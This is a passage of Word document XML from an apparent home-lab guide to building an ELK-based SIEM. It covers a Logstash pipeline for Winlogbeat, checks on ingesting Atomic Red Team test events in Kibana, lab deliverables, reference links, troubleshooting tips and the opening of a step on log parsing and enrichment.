    <w:p w14:paraId="16534747" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="13E23D19" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E9470" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [agent][type] == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A17AE9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF4F789" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC93A20" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C7EB76" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="41A1083A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>output {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5644C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A59F8A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    hosts =&gt; ["elasticsearch:9200"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E62222" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    index =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>-%{+YYYY.MM.dd}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B86A9C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    user =&gt; "elastic"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DED0F7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    password =&gt; "${ELASTIC_PASSWORD}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17037BF5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB732F4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2AA963" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Place pipeline files in docker-elk/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">/pipeline/ (or your Logstash config </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>), restart Logstash to pick up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B1006D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="59B71D3D">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A17AF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4.11 Verify ingestion in Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B765A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kibana → Discover</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17985C8D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Use index pattern </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">-*, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">-*, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>-* as relevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B233875" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Filter by the field you added (e.g., mitre: "T1059.001") or search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>SimulatedPowerShellInvocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139B2ED" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Save a sample Discover query for later use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D920072" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="60E994EF">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2527E0CB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4.12 Tagging &amp; dataset that you should commit to repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E79B40" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Save generated sample logs in atomic-tests/ with README describing test parameters, time, snapshot IDs, and MITRE mapping: atomic-tests/results/YYYYMMDD/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213B8F03" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Commit Logstash pipeline files that processed these tests in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/pipelines/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA38BD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Keep a CSV of test outcomes (atomic-tests/results/summary.csv) showing technique, test time, whether detection fired (you can fill as you test).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F6B8D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="7C03849D">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DBF3D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4.13 Deliverables for Step 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E57C9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">At least </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>labeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> test events</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> ingested into ELK corresponding to the 6 MITRE techniques chosen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA7E95" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Logstash pipeline file(s) used to parse these events committed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/pipeline/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96D553" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>A atomic-tests/ folder with the commands you ran and snapshot IDs for each VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318297A9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kibana Discover screenshots showing the ingested </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>labeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> events (saved into docs/screenshots/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A01054F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>A short docs/ingest-runbook.md describing how to replay the tests safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14359C84" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="2E037B8A">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C22E52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4.14 Links &amp; references for Step 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F77ECBD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Atomic Red Team repo &amp; docs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.atomicredteam.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56C1C62E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> PS Module: </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/Invoke-AtomicTest</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62DCC367" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Suricata docs (EVE JSON output): https://suricata.readthedocs.io/en/latest/output/eve/eve-json-output.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A412773" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Zeek docs: https://docs.zeek.org/en/current/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093493C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> log input docs (read-from-file): </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-log.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D6D5032" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Logstash file input &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> codec: </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/plugins-inputs-file.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15AA805C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>scriptblock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> logging overview: https://learn.microsoft.com/en-us/powershell/scripting/security/overview-of-powershell-script-block-logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490AF601" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="56A72463">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C6120" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.15 Common pitfalls &amp; how to troubleshoot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876DD85" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No events in Kibana:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> status and Logstash logs; ensure network connectivity to port 5044.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D0970" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Events present but not parsed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> adjust Grok patterns or use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> codec if message is JSON (e.g., Suricata </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFFEA85" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell command contents missing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ScriptBlockLogging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> on Windows (lab only).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D4F28A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too many identical events (noise):</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> add rate-limiting or filter with drop in Logstash for test runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28464F0E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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 5 — Parsing, Normalization &amp; Enrichment (Logstash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C538C4D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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A3300" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Convert raw log lines into structured, searchable JSON with meaningful fields (per ECS – Elastic Common Schema) and enrich them using built-in Logstash plugins — so you can write detection rules and dashboards later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC35658" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="1A46BE36">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D47BE3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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.1 Understanding how Logstash fits in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A16825" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024FB28" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> / Suricata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3EB58" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">          ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7828898C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      Logstash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631C65B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   (filter stage)</w:t>
      </w:r>
    </w:p>
